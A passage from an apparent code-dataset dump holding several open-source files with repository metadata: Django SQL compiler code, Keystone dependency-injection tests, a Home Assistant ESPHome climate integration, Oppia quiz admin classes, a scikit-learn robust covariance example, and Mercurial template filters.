def as_sql(self, qn=None):
"""
Creates the SQL for this query. Returns the SQL string and list of
parameters.
"""
if qn is None:
qn = self.quote_name_unless_alias
sql = ('SELECT %s FROM (%s) subquery' % (
', '.join([
aggregate.as_sql(qn, self.connection)
for aggregate in self.query.aggregate_select.values()
]),
self.query.subquery)
)
params = self.query.sub_params
return (sql, params)
class SQLDateCompiler(SQLCompiler):
def results_iter(self):
"""
Returns an iterator over the results from executing this query.
"""
resolve_columns = hasattr(self, 'resolve_columns')
if resolve_columns:
from django.db.models.fields import DateTimeField
fields = [DateTimeField()]
else:
from django.db.backends.util import typecast_timestamp
needs_string_cast = self.connection.features.needs_datetime_string_cast
offset = len(self.query.extra_select)
for rows in self.execute_sql(MULTI):
for row in rows:
date = row[offset]
if resolve_columns:
date = self.resolve_columns(row, fields)[offset]
elif needs_string_cast:
date = typecast_timestamp(str(date))
yield date
def empty_iter():
"""
Returns an iterator containing no results.
"""
yield iter([]).next()
def order_modified_iter(cursor, trim, sentinel):
"""
Yields blocks of rows from a cursor. We use this iterator in the special
case when extra output columns have been added to support ordering
requirements. We must trim those extra columns before anything else can use
the results, since they're only needed to make the SQL valid.
"""
for rows in iter((lambda: cursor.fetchmany(GET_ITERATOR_CHUNK_SIZE)),
sentinel):
yield [r[:-trim] for r in rows]
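# Illustrative note (values assumed): with trim=2, a fetched row such as
# (1, 'name', 'ord_a', 'ord_b') is yielded as (1, 'name'); the ordering-only
# columns never reach the caller.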
| bsd-3-clause | 6,440,348,684,551,839,000 | 42.837233 | 108 | 0.534884 | false |
ilay09/keystone | keystone/tests/unit/common/test_injection.py | 14 | 7730 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from keystone.common import dependency
from keystone.tests import unit
class TestDependencyInjection(unit.BaseTestCase):
def setUp(self):
super(TestDependencyInjection, self).setUp()
dependency.reset()
self.addCleanup(dependency.reset)
def test_dependency_injection(self):
class Interface(object):
def do_work(self):
assert False
@dependency.provider('first_api')
class FirstImplementation(Interface):
def do_work(self):
return True
@dependency.provider('second_api')
class SecondImplementation(Interface):
def do_work(self):
return True
@dependency.requires('first_api', 'second_api')
class Consumer(object):
def do_work_with_dependencies(self):
assert self.first_api.do_work()
assert self.second_api.do_work()
# initialize dependency providers
first_api = FirstImplementation()
second_api = SecondImplementation()
# ... sometime later, initialize a dependency consumer
consumer = Consumer()
# the expected dependencies should be available to the consumer
self.assertIs(consumer.first_api, first_api)
self.assertIs(consumer.second_api, second_api)
self.assertIsInstance(consumer.first_api, Interface)
self.assertIsInstance(consumer.second_api, Interface)
consumer.do_work_with_dependencies()
def test_dependency_provider_configuration(self):
@dependency.provider('api')
class Configurable(object):
def __init__(self, value=None):
self.value = value
def get_value(self):
return self.value
@dependency.requires('api')
class Consumer(object):
def get_value(self):
return self.api.get_value()
# initialize dependency providers
api = Configurable(value=True)
# ... sometime later, initialize a dependency consumer
consumer = Consumer()
# the expected dependencies should be available to the consumer
self.assertIs(consumer.api, api)
self.assertIsInstance(consumer.api, Configurable)
self.assertTrue(consumer.get_value())
def test_dependency_consumer_configuration(self):
@dependency.provider('api')
class Provider(object):
def get_value(self):
return True
@dependency.requires('api')
class Configurable(object):
def __init__(self, value=None):
self.value = value
def get_value(self):
if self.value:
return self.api.get_value()
# initialize dependency providers
api = Provider()
# ... sometime later, initialize a dependency consumer
consumer = Configurable(value=True)
# the expected dependencies should be available to the consumer
self.assertIs(consumer.api, api)
self.assertIsInstance(consumer.api, Provider)
self.assertTrue(consumer.get_value())
def test_inherited_dependency(self):
class Interface(object):
def do_work(self):
assert False
@dependency.provider('first_api')
class FirstImplementation(Interface):
def do_work(self):
return True
@dependency.provider('second_api')
class SecondImplementation(Interface):
def do_work(self):
return True
@dependency.requires('first_api')
class ParentConsumer(object):
def do_work_with_dependencies(self):
assert self.first_api.do_work()
@dependency.requires('second_api')
class ChildConsumer(ParentConsumer):
def do_work_with_dependencies(self):
assert self.second_api.do_work()
super(ChildConsumer, self).do_work_with_dependencies()
# initialize dependency providers
first_api = FirstImplementation()
second_api = SecondImplementation()
# ... sometime later, initialize a dependency consumer
consumer = ChildConsumer()
# dependencies should be naturally inherited
self.assertEqual(
set(['first_api']),
ParentConsumer._dependencies)
self.assertEqual(
set(['first_api', 'second_api']),
ChildConsumer._dependencies)
self.assertEqual(
set(['first_api', 'second_api']),
consumer._dependencies)
# the expected dependencies should be available to the consumer
self.assertIs(consumer.first_api, first_api)
self.assertIs(consumer.second_api, second_api)
self.assertIsInstance(consumer.first_api, Interface)
self.assertIsInstance(consumer.second_api, Interface)
consumer.do_work_with_dependencies()
def test_unresolvable_dependency(self):
@dependency.requires(uuid.uuid4().hex)
class Consumer(object):
pass
def for_test():
Consumer()
dependency.resolve_future_dependencies()
self.assertRaises(dependency.UnresolvableDependencyException, for_test)
def test_circular_dependency(self):
p1_name = uuid.uuid4().hex
p2_name = uuid.uuid4().hex
@dependency.provider(p1_name)
@dependency.requires(p2_name)
class P1(object):
pass
@dependency.provider(p2_name)
@dependency.requires(p1_name)
class P2(object):
pass
p1 = P1()
p2 = P2()
dependency.resolve_future_dependencies()
self.assertIs(getattr(p1, p2_name), p2)
self.assertIs(getattr(p2, p1_name), p1)
def test_reset(self):
# Can reset the registry of providers.
p_id = uuid.uuid4().hex
@dependency.provider(p_id)
class P(object):
pass
p_inst = P()
self.assertIs(dependency.get_provider(p_id), p_inst)
dependency.reset()
self.assertFalse(dependency._REGISTRY)
def test_get_provider(self):
# Can get the instance of a provider using get_provider
provider_name = uuid.uuid4().hex
@dependency.provider(provider_name)
class P(object):
pass
provider_instance = P()
retrieved_provider_instance = dependency.get_provider(provider_name)
self.assertIs(provider_instance, retrieved_provider_instance)
def test_get_provider_not_provided_error(self):
# If no provider and provider is required then fails.
provider_name = uuid.uuid4().hex
self.assertRaises(KeyError, dependency.get_provider, provider_name)
def test_get_provider_not_provided_optional(self):
# If no provider and provider is optional then returns None.
provider_name = uuid.uuid4().hex
self.assertIsNone(dependency.get_provider(provider_name,
dependency.GET_OPTIONAL))
| apache-2.0 | 5,019,655,915,812,358,000 | 31.478992 | 79 | 0.621087 | false |
home-assistant/home-assistant | homeassistant/components/esphome/climate.py | 5 | 9358 | """Support for ESPHome climate devices."""
from __future__ import annotations
from aioesphomeapi import (
ClimateAction,
ClimateFanMode,
ClimateInfo,
ClimateMode,
ClimateState,
ClimateSwingMode,
)
from homeassistant.components.climate import ClimateEntity
from homeassistant.components.climate.const import (
ATTR_HVAC_MODE,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
CURRENT_HVAC_COOL,
CURRENT_HVAC_DRY,
CURRENT_HVAC_FAN,
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
CURRENT_HVAC_OFF,
FAN_AUTO,
FAN_DIFFUSE,
FAN_FOCUS,
FAN_HIGH,
FAN_LOW,
FAN_MEDIUM,
FAN_MIDDLE,
FAN_OFF,
FAN_ON,
HVAC_MODE_COOL,
HVAC_MODE_DRY,
HVAC_MODE_FAN_ONLY,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_HOME,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_SWING_MODE,
SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_RANGE,
SWING_BOTH,
SWING_HORIZONTAL,
SWING_OFF,
SWING_VERTICAL,
)
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_HALVES,
PRECISION_TENTHS,
PRECISION_WHOLE,
TEMP_CELSIUS,
)
from . import (
EsphomeEntity,
esphome_map_enum,
esphome_state_property,
platform_async_setup_entry,
)
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up ESPHome climate devices based on a config entry."""
await platform_async_setup_entry(
hass,
entry,
async_add_entities,
component_key="climate",
info_type=ClimateInfo,
entity_type=EsphomeClimateEntity,
state_type=ClimateState,
)
@esphome_map_enum
def _climate_modes():
return {
ClimateMode.OFF: HVAC_MODE_OFF,
ClimateMode.AUTO: HVAC_MODE_HEAT_COOL,
ClimateMode.COOL: HVAC_MODE_COOL,
ClimateMode.HEAT: HVAC_MODE_HEAT,
ClimateMode.FAN_ONLY: HVAC_MODE_FAN_ONLY,
ClimateMode.DRY: HVAC_MODE_DRY,
}
@esphome_map_enum
def _climate_actions():
return {
ClimateAction.OFF: CURRENT_HVAC_OFF,
ClimateAction.COOLING: CURRENT_HVAC_COOL,
ClimateAction.HEATING: CURRENT_HVAC_HEAT,
ClimateAction.IDLE: CURRENT_HVAC_IDLE,
ClimateAction.DRYING: CURRENT_HVAC_DRY,
ClimateAction.FAN: CURRENT_HVAC_FAN,
}
@esphome_map_enum
def _fan_modes():
return {
ClimateFanMode.ON: FAN_ON,
ClimateFanMode.OFF: FAN_OFF,
ClimateFanMode.AUTO: FAN_AUTO,
ClimateFanMode.LOW: FAN_LOW,
ClimateFanMode.MEDIUM: FAN_MEDIUM,
ClimateFanMode.HIGH: FAN_HIGH,
ClimateFanMode.MIDDLE: FAN_MIDDLE,
ClimateFanMode.FOCUS: FAN_FOCUS,
ClimateFanMode.DIFFUSE: FAN_DIFFUSE,
}
@esphome_map_enum
def _swing_modes():
return {
ClimateSwingMode.OFF: SWING_OFF,
ClimateSwingMode.BOTH: SWING_BOTH,
ClimateSwingMode.VERTICAL: SWING_VERTICAL,
ClimateSwingMode.HORIZONTAL: SWING_HORIZONTAL,
}
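# Rough usage sketch (an assumption based on how these tables are used below):
# esphome_map_enum wraps each dict in a two-way mapping, so for example
# _fan_modes.from_esphome(ClimateFanMode.LOW) gives FAN_LOW and
# _fan_modes.from_hass(FAN_LOW) gives the ESPHome enum member back.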
class EsphomeClimateEntity(EsphomeEntity, ClimateEntity):
"""A climate implementation for ESPHome."""
@property
def _static_info(self) -> ClimateInfo:
return super()._static_info
@property
def _state(self) -> ClimateState | None:
return super()._state
@property
def precision(self) -> float:
"""Return the precision of the climate device."""
        precisions = [PRECISION_WHOLE, PRECISION_HALVES, PRECISION_TENTHS]
        for prec in precisions:
if self._static_info.visual_temperature_step >= prec:
return prec
# Fall back to highest precision, tenths
return PRECISION_TENTHS
@property
def temperature_unit(self) -> str:
"""Return the unit of measurement used by the platform."""
return TEMP_CELSIUS
@property
def hvac_modes(self) -> list[str]:
"""Return the list of available operation modes."""
return [
_climate_modes.from_esphome(mode)
for mode in self._static_info.supported_modes
]
@property
def fan_modes(self):
"""Return the list of available fan modes."""
return [
_fan_modes.from_esphome(mode)
for mode in self._static_info.supported_fan_modes
]
@property
def preset_modes(self):
"""Return preset modes."""
return [PRESET_AWAY, PRESET_HOME] if self._static_info.supports_away else []
@property
def swing_modes(self):
"""Return the list of available swing modes."""
return [
_swing_modes.from_esphome(mode)
for mode in self._static_info.supported_swing_modes
]
@property
def target_temperature_step(self) -> float:
"""Return the supported step of target temperature."""
# Round to one digit because of floating point math
return round(self._static_info.visual_temperature_step, 1)
@property
def min_temp(self) -> float:
"""Return the minimum temperature."""
return self._static_info.visual_min_temperature
@property
def max_temp(self) -> float:
"""Return the maximum temperature."""
return self._static_info.visual_max_temperature
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
features = 0
if self._static_info.supports_two_point_target_temperature:
features |= SUPPORT_TARGET_TEMPERATURE_RANGE
else:
features |= SUPPORT_TARGET_TEMPERATURE
if self._static_info.supports_away:
features |= SUPPORT_PRESET_MODE
if self._static_info.supported_fan_modes:
features |= SUPPORT_FAN_MODE
if self._static_info.supported_swing_modes:
features |= SUPPORT_SWING_MODE
return features
# https://github.com/PyCQA/pylint/issues/3150 for all @esphome_state_property
# pylint: disable=invalid-overridden-method
@esphome_state_property
def hvac_mode(self) -> str | None:
"""Return current operation ie. heat, cool, idle."""
return _climate_modes.from_esphome(self._state.mode)
@esphome_state_property
def hvac_action(self) -> str | None:
"""Return current action."""
# HA has no support feature field for hvac_action
if not self._static_info.supports_action:
return None
return _climate_actions.from_esphome(self._state.action)
@esphome_state_property
def fan_mode(self):
"""Return current fan setting."""
return _fan_modes.from_esphome(self._state.fan_mode)
@esphome_state_property
def preset_mode(self):
"""Return current preset mode."""
return PRESET_AWAY if self._state.away else PRESET_HOME
@esphome_state_property
def swing_mode(self):
"""Return current swing mode."""
return _swing_modes.from_esphome(self._state.swing_mode)
@esphome_state_property
def current_temperature(self) -> float | None:
"""Return the current temperature."""
return self._state.current_temperature
@esphome_state_property
def target_temperature(self) -> float | None:
"""Return the temperature we try to reach."""
return self._state.target_temperature
@esphome_state_property
def target_temperature_low(self) -> float | None:
"""Return the lowbound target temperature we try to reach."""
return self._state.target_temperature_low
@esphome_state_property
def target_temperature_high(self) -> float | None:
"""Return the highbound target temperature we try to reach."""
return self._state.target_temperature_high
async def async_set_temperature(self, **kwargs) -> None:
"""Set new target temperature (and operation mode if set)."""
data = {"key": self._static_info.key}
if ATTR_HVAC_MODE in kwargs:
data["mode"] = _climate_modes.from_hass(kwargs[ATTR_HVAC_MODE])
if ATTR_TEMPERATURE in kwargs:
data["target_temperature"] = kwargs[ATTR_TEMPERATURE]
if ATTR_TARGET_TEMP_LOW in kwargs:
data["target_temperature_low"] = kwargs[ATTR_TARGET_TEMP_LOW]
if ATTR_TARGET_TEMP_HIGH in kwargs:
data["target_temperature_high"] = kwargs[ATTR_TARGET_TEMP_HIGH]
await self._client.climate_command(**data)
async def async_set_hvac_mode(self, hvac_mode: str) -> None:
"""Set new target operation mode."""
await self._client.climate_command(
key=self._static_info.key, mode=_climate_modes.from_hass(hvac_mode)
)
async def async_set_preset_mode(self, preset_mode):
"""Set preset mode."""
away = preset_mode == PRESET_AWAY
await self._client.climate_command(key=self._static_info.key, away=away)
async def async_set_fan_mode(self, fan_mode: str) -> None:
"""Set new fan mode."""
await self._client.climate_command(
key=self._static_info.key, fan_mode=_fan_modes.from_hass(fan_mode)
)
async def async_set_swing_mode(self, swing_mode: str) -> None:
"""Set new swing mode."""
await self._client.climate_command(
key=self._static_info.key, swing_mode=_swing_modes.from_hass(swing_mode)
)
| apache-2.0 | 428,674,981,804,760,640 | 30.089701 | 84 | 0.635713 | false |
DigitalCampus/django-ujjwal-oppia | oppia/quiz/admin.py | 6 | 1718 | # oppia/quiz/admin.py
from django.contrib import admin
from oppia.quiz.models import Quiz, Question, Response, ResponseProps, QuestionProps
from oppia.quiz.models import QuizProps, QuizQuestion, QuizAttempt, QuizAttemptResponse
class QuizAttemptAdmin(admin.ModelAdmin):
list_display = ('user', 'quiz', 'attempt_date', 'score', 'ip', 'instance_id','agent')
class QuestionPropsAdmin(admin.ModelAdmin):
list_display = ('question', 'name', 'value')
class ResponsePropsAdmin(admin.ModelAdmin):
list_display = ('response', 'name', 'value')
class QuizPropsAdmin(admin.ModelAdmin):
list_display = ('quiz', 'name', 'value')
class QuestionAdmin(admin.ModelAdmin):
list_display = ('owner', 'title', 'type','created_date','lastupdated_date')
class QuizAttemptResponseAdmin(admin.ModelAdmin):
list_display = ('question', 'score', 'text')
class QuizAdmin(admin.ModelAdmin):
list_display = ('title', 'description', 'owner', 'created_date','lastupdated_date','draft','deleted')
class ResponseAdmin(admin.ModelAdmin):
list_display = ('question', 'title', 'owner', 'created_date','lastupdated_date','score','order')
class QuizQuestionAdmin(admin.ModelAdmin):
list_display = ('quiz', 'question', 'order')
admin.site.register(Quiz, QuizAdmin)
admin.site.register(Question,QuestionAdmin)
admin.site.register(Response,ResponseAdmin)
admin.site.register(ResponseProps, ResponsePropsAdmin)
admin.site.register(QuestionProps, QuestionPropsAdmin)
admin.site.register(QuizProps, QuizPropsAdmin)
admin.site.register(QuizQuestion, QuizQuestionAdmin)
admin.site.register(QuizAttempt, QuizAttemptAdmin)
admin.site.register(QuizAttemptResponse, QuizAttemptResponseAdmin) | gpl-3.0 | 4,412,428,456,045,342,000 | 39.928571 | 106 | 0.74447 | false |
DailyActie/Surrogate-Model | 01-codes/scikit-learn-master/examples/covariance/plot_mahalanobis_distances.py | 1 | 6231 | r"""
================================================================
Robust covariance estimation and Mahalanobis distances relevance
================================================================
An example to show covariance estimation with the Mahalanobis
distances on Gaussian distributed data.
For Gaussian distributed data, the distance of an observation
:math:`x_i` to the mode of the distribution can be computed using its
Mahalanobis distance: :math:`d_{(\mu,\Sigma)}(x_i)^2 = (x_i -
\mu)'\Sigma^{-1}(x_i - \mu)` where :math:`\mu` and :math:`\Sigma` are
the location and the covariance of the underlying Gaussian
distribution.
In practice, :math:`\mu` and :math:`\Sigma` are replaced by some
estimates. The usual covariance maximum likelihood estimate is very
sensitive to the presence of outliers in the data set, and therefore
so are the corresponding Mahalanobis distances. It is better to
use a robust estimator of covariance to guarantee that the estimation is
resistant to "erroneous" observations in the data set and that the
associated Mahalanobis distances accurately reflect the true
organisation of the observations.
The Minimum Covariance Determinant estimator is a robust,
high-breakdown point (i.e. it can be used to estimate the covariance
matrix of highly contaminated datasets, up to
:math:`\frac{n_\text{samples}-n_\text{features}-1}{2}` outliers)
estimator of covariance. The idea is to find
:math:`\frac{n_\text{samples}+n_\text{features}+1}{2}`
observations whose empirical covariance has the smallest determinant,
yielding a "pure" subset of observations from which to compute
standards estimates of location and covariance.
The Minimum Covariance Determinant estimator (MCD) has been introduced
by P. J. Rousseeuw in [1].
This example illustrates how the Mahalanobis distances are affected by
outlying data: observations drawn from a contaminating distribution
are not distinguishable from the observations coming from the real,
Gaussian distribution that one may want to work with. Using MCD-based
Mahalanobis distances, the two populations become
distinguishable. Associated applications include outlier detection,
observation ranking, clustering, ...
For visualization purposes, the cube root of the Mahalanobis distances
is represented in the boxplot, as Wilson and Hilferty suggest [2]
[1] P. J. Rousseeuw. Least median of squares regression. J. Am
Stat Ass, 79:871, 1984.
[2] Wilson, E. B., & Hilferty, M. M. (1931). The distribution of chi-square.
Proceedings of the National Academy of Sciences of the United States
of America, 17, 684-688.
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from sklearn.covariance import EmpiricalCovariance, MinCovDet
n_samples = 125
n_outliers = 25
n_features = 2
# generate data
gen_cov = np.eye(n_features)
gen_cov[0, 0] = 2.
X = np.dot(np.random.randn(n_samples, n_features), gen_cov)
# add some outliers
outliers_cov = np.eye(n_features)
outliers_cov[np.arange(1, n_features), np.arange(1, n_features)] = 7.
X[-n_outliers:] = np.dot(np.random.randn(n_outliers, n_features), outliers_cov)
# fit a Minimum Covariance Determinant (MCD) robust estimator to data
robust_cov = MinCovDet().fit(X)
# compare estimators learnt from the full data set with true parameters
emp_cov = EmpiricalCovariance().fit(X)
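# For reference (not part of the original example): the squared Mahalanobis
# distance of a point x under an estimate (mu, Sigma) is
#     d2 = (x - mu).T.dot(np.linalg.inv(Sigma)).dot(x - mu)
# which is what the .mahalanobis() calls below evaluate for each observation.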
###############################################################################
# Display results
fig = plt.figure()
plt.subplots_adjust(hspace=-.1, wspace=.4, top=.95, bottom=.05)
# Show data set
subfig1 = plt.subplot(3, 1, 1)
inlier_plot = subfig1.scatter(X[:, 0], X[:, 1],
color='black', label='inliers')
outlier_plot = subfig1.scatter(X[:, 0][-n_outliers:], X[:, 1][-n_outliers:],
color='red', label='outliers')
subfig1.set_xlim(subfig1.get_xlim()[0], 11.)
subfig1.set_title("Mahalanobis distances of a contaminated data set:")
# Show contours of the distance functions
xx, yy = np.meshgrid(np.linspace(plt.xlim()[0], plt.xlim()[1], 100),
np.linspace(plt.ylim()[0], plt.ylim()[1], 100))
zz = np.c_[xx.ravel(), yy.ravel()]
mahal_emp_cov = emp_cov.mahalanobis(zz)
mahal_emp_cov = mahal_emp_cov.reshape(xx.shape)
emp_cov_contour = subfig1.contour(xx, yy, np.sqrt(mahal_emp_cov),
cmap=plt.cm.PuBu_r,
linestyles='dashed')
mahal_robust_cov = robust_cov.mahalanobis(zz)
mahal_robust_cov = mahal_robust_cov.reshape(xx.shape)
robust_contour = subfig1.contour(xx, yy, np.sqrt(mahal_robust_cov),
cmap=plt.cm.YlOrBr_r, linestyles='dotted')
subfig1.legend([emp_cov_contour.collections[1], robust_contour.collections[1],
inlier_plot, outlier_plot],
['MLE dist', 'robust dist', 'inliers', 'outliers'],
loc="upper right", borderaxespad=0)
plt.xticks(())
plt.yticks(())
# Plot the scores for each point
emp_mahal = emp_cov.mahalanobis(X - np.mean(X, 0)) ** (0.33)
subfig2 = plt.subplot(2, 2, 3)
subfig2.boxplot([emp_mahal[:-n_outliers], emp_mahal[-n_outliers:]], widths=.25)
subfig2.plot(1.26 * np.ones(n_samples - n_outliers),
emp_mahal[:-n_outliers], '+k', markeredgewidth=1)
subfig2.plot(2.26 * np.ones(n_outliers),
emp_mahal[-n_outliers:], '+k', markeredgewidth=1)
subfig2.axes.set_xticklabels(('inliers', 'outliers'), size=15)
subfig2.set_ylabel(r"$\sqrt[3]{\rm{(Mahal. dist.)}}$", size=16)
subfig2.set_title("1. from non-robust estimates\n(Maximum Likelihood)")
plt.yticks(())
robust_mahal = robust_cov.mahalanobis(X - robust_cov.location_) ** (0.33)
subfig3 = plt.subplot(2, 2, 4)
subfig3.boxplot([robust_mahal[:-n_outliers], robust_mahal[-n_outliers:]],
widths=.25)
subfig3.plot(1.26 * np.ones(n_samples - n_outliers),
robust_mahal[:-n_outliers], '+k', markeredgewidth=1)
subfig3.plot(2.26 * np.ones(n_outliers),
robust_mahal[-n_outliers:], '+k', markeredgewidth=1)
subfig3.axes.set_xticklabels(('inliers', 'outliers'), size=15)
subfig3.set_ylabel(r"$\sqrt[3]{\rm{(Mahal. dist.)}}$", size=16)
subfig3.set_title("2. from robust estimates\n(Minimum Covariance Determinant)")
plt.yticks(())
plt.show()
| mit | 4,281,541,903,728,256,500 | 42.573427 | 79 | 0.679827 | false |
gorcz/mercurial | mercurial/templatefilters.py | 2 | 13028 | # template-filters.py - common template expansion filters
#
# Copyright 2005-2008 Matt Mackall <[email protected]>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import cgi, re, os, time, urllib
import encoding, node, util
import hbisect
import templatekw
def addbreaks(text):
""":addbreaks: Any text. Add an XHTML "<br />" tag before the end of
every line except the last.
"""
return text.replace('\n', '<br/>\n')
agescales = [("year", 3600 * 24 * 365, 'Y'),
("month", 3600 * 24 * 30, 'M'),
("week", 3600 * 24 * 7, 'W'),
("day", 3600 * 24, 'd'),
("hour", 3600, 'h'),
("minute", 60, 'm'),
("second", 1, 's')]
def age(date, abbrev=False):
""":age: Date. Returns a human-readable date/time difference between the
given date/time and the current date/time.
"""
def plural(t, c):
if c == 1:
return t
return t + "s"
def fmt(t, c, a):
if abbrev:
return "%d%s" % (c, a)
return "%d %s" % (c, plural(t, c))
now = time.time()
then = date[0]
future = False
if then > now:
future = True
delta = max(1, int(then - now))
if delta > agescales[0][1] * 30:
return 'in the distant future'
else:
delta = max(1, int(now - then))
if delta > agescales[0][1] * 2:
return util.shortdate(date)
for t, s, a in agescales:
n = delta // s
if n >= 2 or s == 1:
if future:
return '%s from now' % fmt(t, n, a)
return '%s ago' % fmt(t, n, a)
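# Illustrative example (dates assumed): for a date roughly 90 minutes in the
# past, age(date) returns '90 minutes ago' and age(date, abbrev=True) returns
# '90m ago'; dates more than two years old fall back to util.shortdate(date).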
def basename(path):
""":basename: Any text. Treats the text as a path, and returns the last
component of the path after splitting by the path separator
(ignoring trailing separators). For example, "foo/bar/baz" becomes
"baz" and "foo/bar//" becomes "bar".
"""
return os.path.basename(path)
def count(i):
""":count: List or text. Returns the length as an integer."""
return len(i)
def datefilter(text):
""":date: Date. Returns a date in a Unix date format, including the
timezone: "Mon Sep 04 15:13:13 2006 0700".
"""
return util.datestr(text)
def domain(author):
""":domain: Any text. Finds the first string that looks like an email
address, and extracts just the domain component. Example: ``User
<[email protected]>`` becomes ``example.com``.
"""
f = author.find('@')
if f == -1:
return ''
author = author[f + 1:]
f = author.find('>')
if f >= 0:
author = author[:f]
return author
def email(text):
""":email: Any text. Extracts the first string that looks like an email
address. Example: ``User <[email protected]>`` becomes
``[email protected]``.
"""
return util.email(text)
def escape(text):
""":escape: Any text. Replaces the special XML/XHTML characters "&", "<"
and ">" with XML entities, and filters out NUL characters.
"""
return cgi.escape(text.replace('\0', ''), True)
para_re = None
space_re = None
def fill(text, width, initindent='', hangindent=''):
'''fill many paragraphs with optional indentation.'''
global para_re, space_re
if para_re is None:
para_re = re.compile('(\n\n|\n\\s*[-*]\\s*)', re.M)
space_re = re.compile(r' +')
def findparas():
start = 0
while True:
m = para_re.search(text, start)
if not m:
uctext = unicode(text[start:], encoding.encoding)
w = len(uctext)
while 0 < w and uctext[w - 1].isspace():
w -= 1
yield (uctext[:w].encode(encoding.encoding),
uctext[w:].encode(encoding.encoding))
break
yield text[start:m.start(0)], m.group(1)
start = m.end(1)
return "".join([util.wrap(space_re.sub(' ', util.wrap(para, width)),
width, initindent, hangindent) + rest
for para, rest in findparas()])
def fill68(text):
""":fill68: Any text. Wraps the text to fit in 68 columns."""
return fill(text, 68)
def fill76(text):
""":fill76: Any text. Wraps the text to fit in 76 columns."""
return fill(text, 76)
def firstline(text):
""":firstline: Any text. Returns the first line of text."""
try:
return text.splitlines(True)[0].rstrip('\r\n')
except IndexError:
return ''
def hexfilter(text):
""":hex: Any text. Convert a binary Mercurial node identifier into
its long hexadecimal representation.
"""
return node.hex(text)
def hgdate(text):
""":hgdate: Date. Returns the date as a pair of numbers: "1157407993
25200" (Unix timestamp, timezone offset).
"""
return "%d %d" % text
def isodate(text):
""":isodate: Date. Returns the date in ISO 8601 format: "2009-08-18 13:00
+0200".
"""
return util.datestr(text, '%Y-%m-%d %H:%M %1%2')
def isodatesec(text):
""":isodatesec: Date. Returns the date in ISO 8601 format, including
seconds: "2009-08-18 13:00:13 +0200". See also the rfc3339date
filter.
"""
return util.datestr(text, '%Y-%m-%d %H:%M:%S %1%2')
def indent(text, prefix):
'''indent each non-empty line of text after first with prefix.'''
lines = text.splitlines()
num_lines = len(lines)
endswithnewline = text[-1:] == '\n'
def indenter():
for i in xrange(num_lines):
l = lines[i]
if i and l.strip():
yield prefix
yield l
if i < num_lines - 1 or endswithnewline:
yield '\n'
return "".join(indenter())
def json(obj):
if obj is None or obj is False or obj is True:
return {None: 'null', False: 'false', True: 'true'}[obj]
elif isinstance(obj, int) or isinstance(obj, float):
return str(obj)
elif isinstance(obj, str):
u = unicode(obj, encoding.encoding, 'replace')
return '"%s"' % jsonescape(u)
elif isinstance(obj, unicode):
return '"%s"' % jsonescape(obj)
elif util.safehasattr(obj, 'keys'):
out = []
for k, v in sorted(obj.iteritems()):
s = '%s: %s' % (json(k), json(v))
out.append(s)
return '{' + ', '.join(out) + '}'
elif util.safehasattr(obj, '__iter__'):
out = []
for i in obj:
out.append(json(i))
return '[' + ', '.join(out) + ']'
elif util.safehasattr(obj, '__call__'):
return json(obj())
else:
raise TypeError('cannot encode type %s' % obj.__class__.__name__)
def _uescape(c):
if ord(c) < 0x80:
return c
else:
return '\\u%04x' % ord(c)
_escapes = [
('\\', '\\\\'), ('"', '\\"'), ('\t', '\\t'), ('\n', '\\n'),
('\r', '\\r'), ('\f', '\\f'), ('\b', '\\b'),
('<', '\\u003c'), ('>', '\\u003e'), ('\0', '\\u0000')
]
def jsonescape(s):
for k, v in _escapes:
s = s.replace(k, v)
return ''.join(_uescape(c) for c in s)
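# Illustrative example (values assumed): json({'k': 'v', 'n': [1, True]})
# produces '{"k": "v", "n": [1, true]}'; jsonescape() supplies the backslash
# escapes and \uXXXX sequences for non-ASCII characters inside string values.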
def localdate(text):
""":localdate: Date. Converts a date to local date."""
return (util.parsedate(text)[0], util.makedate()[1])
def lower(text):
""":lower: Any text. Converts the text to lowercase."""
return encoding.lower(text)
def nonempty(str):
""":nonempty: Any text. Returns '(none)' if the string is empty."""
return str or "(none)"
def obfuscate(text):
""":obfuscate: Any text. Returns the input text rendered as a sequence of
XML entities.
"""
text = unicode(text, encoding.encoding, 'replace')
return ''.join(['&#%d;' % ord(c) for c in text])
def permissions(flags):
if "l" in flags:
return "lrwxrwxrwx"
if "x" in flags:
return "-rwxr-xr-x"
return "-rw-r--r--"
def person(author):
""":person: Any text. Returns the name before an email address,
interpreting it as per RFC 5322.
>>> person('foo@bar')
'foo'
>>> person('Foo Bar <foo@bar>')
'Foo Bar'
>>> person('"Foo Bar" <foo@bar>')
'Foo Bar'
>>> person('"Foo \"buz\" Bar" <foo@bar>')
'Foo "buz" Bar'
>>> # The following are invalid, but do exist in real-life
...
>>> person('Foo "buz" Bar <foo@bar>')
'Foo "buz" Bar'
>>> person('"Foo Bar <foo@bar>')
'Foo Bar'
"""
if '@' not in author:
return author
f = author.find('<')
if f != -1:
return author[:f].strip(' "').replace('\\"', '"')
f = author.find('@')
return author[:f].replace('.', ' ')
def rfc3339date(text):
""":rfc3339date: Date. Returns a date using the Internet date format
specified in RFC 3339: "2009-08-18T13:00:13+02:00".
"""
return util.datestr(text, "%Y-%m-%dT%H:%M:%S%1:%2")
def rfc822date(text):
""":rfc822date: Date. Returns a date using the same format used in email
headers: "Tue, 18 Aug 2009 13:00:13 +0200".
"""
return util.datestr(text, "%a, %d %b %Y %H:%M:%S %1%2")
def short(text):
""":short: Changeset hash. Returns the short form of a changeset hash,
i.e. a 12 hexadecimal digit string.
"""
return text[:12]
def shortbisect(text):
""":shortbisect: Any text. Treats `text` as a bisection status, and
